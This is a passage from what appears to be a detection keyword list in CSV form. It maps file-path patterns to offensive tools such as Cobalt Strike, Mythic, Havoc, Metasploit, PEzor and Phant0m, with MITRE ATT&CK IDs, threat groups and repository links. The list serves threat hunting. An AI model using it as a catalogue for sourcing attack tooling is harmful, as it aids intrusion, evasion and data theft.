T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" 
+"*/payload_scripts/artifact*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" +"*/payload_service.sh*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. 
Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Payload_Type/athena*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/Payload_Types/*","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"*/payload2.ps1*","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","720","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" +"*/payloads/DllLdr/*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*/payloads/payloads.go*","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/liamg/traitor","1","1","N/A","N/A","10","6215","494","2023-03-16T16:21:13Z","2021-01-24T10:50:15Z" +"*/payloads/util*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","1","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"*/pcanywhere-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/pcworx-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/PDF_Payload/script.txt*","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","245","35","2023-05-10T15:21:26Z","2021-05-03T14:46:16Z" +"*/pe/dll*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/PE/InjectPE.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/pe_to_shellcode*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*/pe2shc.exe*","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1095","177","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" +"*/pe2shc/*","offensive_tool_keyword","pe_to_shellcode","Converts PE into a shellcode","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/hasherezade/pe_to_shellcode","1","1","N/A","N/A","10","2008","402","2023-08-15T14:42:12Z","2018-08-19T22:57:07Z" +"*/PEASS-ng.git*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege 
Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*/PEASS-ng/*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*/PeerToPeerService.*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*/peinjector*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/peinjector.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/pentest*","offensive_tool_keyword","_","pentest keyword detection. detect potential pentesters using this keyword in file name. 
repository or command line","N/A","N/A","N/A","N/A","Exploitation tools","N/A","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/PE-Obfuscator*","offensive_tool_keyword","PE-Obfuscator","PE obfuscator with Evasion in mind","T1027 - T1055 - T1140 - T1564.003 - T1027.002","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/PE-Obfuscator","1","1","N/A","N/A","2","196","38","2023-04-25T04:58:12Z","2023-04-25T04:00:15Z" +"*/perf_swevent64*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/persist.tpl*","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","N/A","C2","https://github.com/Arno0x/DBC2","1","1","N/A","10","10","269","85","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z" +"*/PersistBOF/*","offensive_tool_keyword","cobaltstrike","A BOF to automate common persistence tasks for red teamers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/IcebreakerSecurity/PersistBOF","1","1","N/A","10","10","224","41","2023-03-07T11:23:42Z","2022-03-29T14:50:47Z" +"*/Persistence.cpp*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*/Persistence.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/persistence/*.ps1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1133","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/persistence/*.psm1","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1134","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/Persistence/InstallUtil.*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/persistence2.rc*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation 
tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/peterspbr/dirty-pipe-otw*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/peterspbr/dirty-pipe-otw","1","1","N/A","N/A","1","1","0","2022-03-10T03:42:15Z","2022-03-09T17:21:17Z" +"*/PetitPotam.git*","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","1","N/A","N/A","10","1591","272","2023-07-23T17:07:07Z","2021-07-18T18:19:54Z" +"*/petitpotam.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/PEzor.cna*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 
- TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/PEzor.git*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/PEzor.sh *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - 
T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/PEzor/inject.cpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation 
tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/pfsense_clickjacking*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/pgsql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Phant0m.git*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*/phant0m-exe*","offensive_tool_keyword","Phant0m","Windows Event Log Killer","T1070.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/hlldz/Phant0m","1","1","N/A","N/A","10","1655","319","2023-09-21T16:08:18Z","2017-05-02T17:19:30Z" +"*/phishing.py*","offensive_tool_keyword","Vajra","Vajra is a UI based tool with multiple techniques for attacking and enumerating in target's Azure environment","T1087 - T1098 - T1583 - T1078 - T1110 - T1566 - T1537 - T1020 - T1526 - T1482","TA0003 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Exploitation tools","https://github.com/TROUBLE-1/Vajra","1","1","N/A","N/A","4","336","57","2023-03-16T09:45:53Z","2022-03-01T14:31:27Z" +"*/Phishing.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"*/phishing/*.html*","offensive_tool_keyword","venom","venom - C2 shellcode 